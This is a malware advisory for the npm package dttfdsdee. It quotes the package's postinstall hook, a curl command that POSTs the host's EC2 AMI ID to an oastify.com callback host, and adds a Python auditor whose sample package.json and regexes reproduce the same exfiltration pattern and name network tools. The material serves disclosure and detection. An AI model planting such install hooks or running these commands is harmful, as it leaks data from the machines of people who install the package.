MAL-2026-6498

Malicious code in dttfdsdee (npm)

Details

## Source: amazon-inspector (7f61e9b10455dc3781fcee5dfb2654ff824c2ac2e51dfaf7ebfba342f570f66c)

package.json declares a postinstall lifecycle script that runs on every npm install: `curl -X POST -d "$(cat /data/ami-id)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. This reads the AWS EC2 AMI identifier from the installer's host and POSTs it over plain HTTP to an attacker-controlled oastify.com subdomain (Burp Collaborator out-of-band callback host). It auto-executes without user consent and is unrelated to any documented package purpose; the internal name claims to be `easy-string-kit`, while the author, repository, and homepage metadata fields are empty and a keyword contains an embedded shell fragment (`trunls -lae`). The shape (throwaway name, missing maintainer metadata, OAST exfiltration of a host identifier on install) is consistent with reconnaissance / dependency-confusion probing of internal build environments.

## Source: ossf-package-analysis (bb785783c80ff1b3c13e9d6dc3b3c583d2eeb58f9f7f102d219a7448a71560b5)

The OpenSSF Package Analysis project identified 'dttfdsdee' @ 1.0.1 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.
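A defender-side check for the install-time exfiltration pattern described under the amazon-inspector source, added here as an example and not code from the advisory or from either analysis source: it audits a package.json for lifecycle scripts that call network tools, splice a host file into the command via command substitution, use plaintext HTTP or point at an oastify.com callback host, and also flags the empty maintainer metadata, shell-like keyword and name mismatch noted above. The sample package.json is constructed to mirror that description, with a placeholder subdomain instead of the real callback host.

```python
import json
import re

# Constructed sample modelled on the advisory's description (placeholder callback host, not the real IoC).
SAMPLE_PACKAGE_JSON = """{
  "name": "easy-string-kit",
  "version": "1.0.1",
  "author": "",
  "repository": "",
  "homepage": "",
  "keywords": ["strings", "trunls -lae"],
  "scripts": {
    "postinstall": "curl -X POST -d \\"$(cat /data/ami-id)\\" http://CONSTRUCTED-SUBDOMAIN.oastify.com/data"
  }
}"""

# npm hooks that run automatically during `npm install` of a dependency.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")
NETWORK_TOOLS = re.compile(r"\b(curl|wget|nc|ncat)\b")
OAST_HOST = re.compile(r"\.oastify\.com\b")   # Burp Collaborator callback domain named in the advisory
HOST_FILE_READ = re.compile(r"\$\(\s*cat\s+/")  # command substitution that reads a file off the host
METADATA = ("author", "repository", "homepage")

def audit_package_json(text: str, published_name: str = "") -> list:
    """Return a list of human-readable findings; an empty list means nothing suspicious was seen."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE or not isinstance(cmd, str):
            continue
        if NETWORK_TOOLS.search(cmd):
            findings.append(f"{hook}: network tool invoked from a lifecycle script")
        if OAST_HOST.search(cmd):
            findings.append(f"{hook}: out-of-band callback host (oastify.com)")
        if HOST_FILE_READ.search(cmd):
            findings.append(f"{hook}: reads a host file into the command")
        if "http://" in cmd:
            findings.append(f"{hook}: plaintext HTTP endpoint")
    missing = [m for m in METADATA if not pkg.get(m)]
    if missing:
        findings.append("missing maintainer metadata: " + ", ".join(missing))
    if any(re.search(r"\s-\w", k) for k in pkg.get("keywords", []) if isinstance(k, str)):
        findings.append("keyword contains a shell-like fragment")
    # published_name is the name on the registry; mismatch with package.json is the "internal name" oddity above.
    if published_name and pkg.get("name") != published_name:
        findings.append(f"name mismatch: package.json says {pkg.get('name')!r}, registry says {published_name!r}")
    return findings

if __name__ == "__main__":
    for f in audit_package_json(SAMPLE_PACKAGE_JSON, "dttfdsdee"):
        print("FLAG:", f)
```

Run it against an unpacked tarball's package.json before the package is installed; any lifecycle finding is a reason to inspect the script by hand rather than let `npm install` execute it.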

Affected packages

npm / dttfdsdee

No fixed version published yet for dttfdsdee (npm). Pin to a known-safe version or switch to an alternative.